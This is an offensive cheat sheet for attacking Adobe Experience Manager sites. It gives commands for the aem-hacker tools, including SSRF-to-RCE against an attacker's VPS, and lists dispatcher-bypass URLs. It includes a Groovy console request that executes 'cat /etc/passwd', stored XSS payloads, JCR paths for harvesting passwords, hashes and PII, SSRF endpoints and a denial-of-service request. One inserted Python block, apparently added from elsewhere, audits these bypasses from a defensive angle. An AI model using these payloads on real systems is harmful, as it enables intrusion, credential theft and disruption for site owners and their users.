AEM [Adobe CMS]


Last updated 1 year ago


video

method

  • collect subdomains

  • use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify AEM

  • python3 ./aem_hacker.py -u <target-url> --host localhost

  • use ../fuzzing/service/aem.txt to fuzz on paths

aem tools

python3 aem_hacker.py    -u <target-url> --host yourvpshostname   => common usage
python3 aem_discovery.py --file urls.txt --workers 150            => discover URLs
python3 aem_enum.py      --url <target-url>                       => automate usernames and secrets grabbing
python3 aem_ssrf2rce.py  --url <target-url> --fakeaem yourvps
python3 aem_server.py

aem dispatcher bypasses

<https://aemsite/bin/querybuilder.json>              => blocked
<https://aemsite/bin/querybuilder.json/a.css>        => allow
<https://aemsite/bin/querybuilder.json/a.html>       => allow
<https://aemsite/bin/querybuilder.json/a.ico>        => allow
<https://aemsite/bin/querybuilder.json/a.png>        => allow
<https://aemsite/bin/querybuilder.json;%0aa.css>     => allow
<https://aemsite/bin/querybuilder.json/a.1.json>     => allow

<https://aemsite/bin/querybuilder.json>              => blocked
<https://aemsite/bin/querybuilder.json/a.css>        => blocked
<https://aemsite/bin/querybuilder.json;%0aa.css>     => blocked
<https://aemsite/bin/querybuilder.json.servlet.css>  => allow
<https://aemsite/bin/querybuilder.json.servlet.html> => allow
<https://aemsite/bin/querybuilder.json.servlet.ico>  => allow
<https://aemsite/bin/querybuilder.json.servlet.png>  => allow

///etc.json                 instead of  /etc.json
///bin///querybuilder.json  instead of  /bin/querybuilder.json
SSRF should allow sending a GET request and seeing the response:
  • Opensocial proxy
  • SSRF in ReportingServicesProxyServlet (CVE-2018-12809)
POST /bin/groovyconsole/post.servlet HTTP/1.1
HOST:

script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt
POST //////content/usergenerated/etc/commerce/smartlists/vv.json

aa=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b
POST /content/usergenerated/etc/commerce/smartlists/xssaaa.html=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b
POST /content/usergenerated/etc/commerce/smartlists/xssed

jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b&jcr:mimeType=text/html
everything is stored in the JCR repository:
  • secrets (passwords, encryption keys, tokens)
  • configuration
  • PII
  • usernames

what to use
  • DefaultGETServlet
  • QueryBuilderJsonServlet
  • QueryBuilderFeedServlet
  • GQLSearchServlet
  • other

DefaultGETServlet
  • allows getting a JCR node with its properties
  • selectors
    • tidy
    • infinity
    • numeric value: -1, 0, 1 ... 99999
  • formats
    • json
    • xml
    • res
  • <https://aem.site/tidy.3.json>
    • /    => jcr:root
    • tidy => selector tidy
    • 3    => selector depth
    • json => output format
  • how to grab
    • get node names, starting from jcr:root:
      • /.1.json
      • /.ext.json
      • /.childrenlist.json
    • or guess node names:
      • common names /content, /home, /var, /etc
    • dump props for each child node of jcr:root:
      • /etc.json or /etc.s.json or /etc.-1.json
  • what to grab
    • interesting nodes
      • /etc => may contain secrets (passwords, encryption keys)
      • /apps/system/config => passwords
      • /apps/<smth>/config => passwords
      • /var => may contain private PII
      • /home => password hashes, PII
    • interesting props (contain AEM usernames)
      • jcr:createdBy
      • jcr:lastModifiedBy
      • cq:lastModifiedBy
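Why the string-matching dispatcher rules above miss the listed variants, and how the selector/extension decomposition that DefaultGETServlet relies on falls out of the same resolution step. This is an added example, not code from this page or from aem-hacker: `resolve_sling` approximates Sling's dot-cutting resource resolution against a constructed resource set, and `normalize_path` and the two filter functions are assumptions of the example, not Dispatcher code.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed stand-in for the JCR / servlet registry (assumption of this example).
KNOWN_RESOURCES = {"/", "/bin/querybuilder.json", "/bin/querybuilder.feed", "/etc"}
DENIED_RESOURCES = {"/bin/querybuilder.json", "/bin/querybuilder.feed"}

def normalize_path(url):
    """Undo URL-level tricks that a raw string match never sees."""
    path = unquote(urlsplit(url).path)   # ";%0aa.css" -> ";\naa.css"
    path = re.sub(r";[^/]*", "", path)   # drop ';'-parameters inside a segment
    return re.sub(r"/{2,}", "/", path)   # "///bin///x" -> "/bin/x"

def resolve_sling(path, resources=KNOWN_RESOURCES):
    """Approximate Sling resolution: cut at the last '.' (or at a later '/')
    until a candidate is a known resource; the leftover is .selectors.ext/suffix.
    Unknown paths resolve to the shortest candidate (Sling's NonExistingResource)."""
    candidate = path
    while candidate not in resources:
        dot, slash = candidate.rfind("."), candidate.rfind("/")
        if dot < 0:
            break
        candidate = candidate[:slash] if slash > dot else candidate[:dot]
    rest = path[1:] if candidate == "/" else path[len(candidate):]
    sel_ext, _, suffix = rest.partition("/")
    parts = sel_ext.lstrip(".").split(".") if sel_ext else []
    return {"resource": candidate, "selectors": parts[:-1],
            "extension": parts[-1] if parts else "", "suffix": "/" + suffix if suffix else ""}

def naive_url_rule_blocks(url):
    """Dispatcher-style deny keyed on the raw request-URL string."""
    return urlsplit(url).path == "/bin/querybuilder.json"

def resolved_rule_blocks(url, denied=DENIED_RESOURCES):
    """Deny keyed on the resource Sling will actually serve."""
    return resolve_sling(normalize_path(url))["resource"] in denied

BYPASS_VARIANTS = [  # the variants listed on this page
    "https://aemsite/bin/querybuilder.json/a.css",
    "https://aemsite/bin/querybuilder.json;%0aa.css",
    "https://aemsite/bin/querybuilder.json/a.1.json",
    "https://aemsite/bin/querybuilder.json.servlet.css",
    "https://aemsite///bin///querybuilder.json",
]

def audit(urls=BYPASS_VARIANTS):
    """Which variants each rule style lets through."""
    return {"naive_misses": [u for u in urls if not naive_url_rule_blocks(u)],
            "resolved_misses": [u for u in urls if not resolved_rule_blocks(u)]}
```

Every variant resolves to the same servlet resource, which is why deny rules keyed on the resolved /path, /selectors and /extension rather than on the raw /url string are what closes this class of bypass.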
QueryBuilderJsonServlet / QueryBuilderFeedServlet
  • path
    • /bin/querybuilder.json
    • /bin/querybuilder.feed.servlet
  • examples of useful searches
    • type=nt:file&nodename=*.zip
    • path=/home&p.hits=full&p.limit=-1
    • hasPermission=jcr:write&path=/content
    • hasPermission=jcr:addChildNodes&path=/content
    • hasPermission=jcr:modifyProperties&path=/content
    • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000
    • path=/etc&path.flat=true&p.nodedepth=0
    • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1
SSRF via Opensocial proxy
  • /libs/opensocial/proxy?container=default&url=http://target
  • /libs/shindig/proxy?container=default&url=http://target
SSRF via ReportingServicesProxyServlet (CVE-2018-12809)
  • /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a
  • /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a
  • /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e

SSRF via SiteCatalystServlet
  • /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
  • /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
  • /.ext.infinity.json
  • /.ext.infinity.json?tidy=true
  • /bin/querybuilder.json?type=nt:base&p.limit=-1
  • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=
  • /content.assetsearch.json?query=*&start=0&limit=10&random=123
  • /..assetsearch.json?query=*&start=0&limit=10&random=123
  • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111
https://www.youtube.com/watch?v=EQNBQCQMouk
https://github.com/0ang3el/aem-hacker
https://github.com/0ang3el/aem-rce-bundle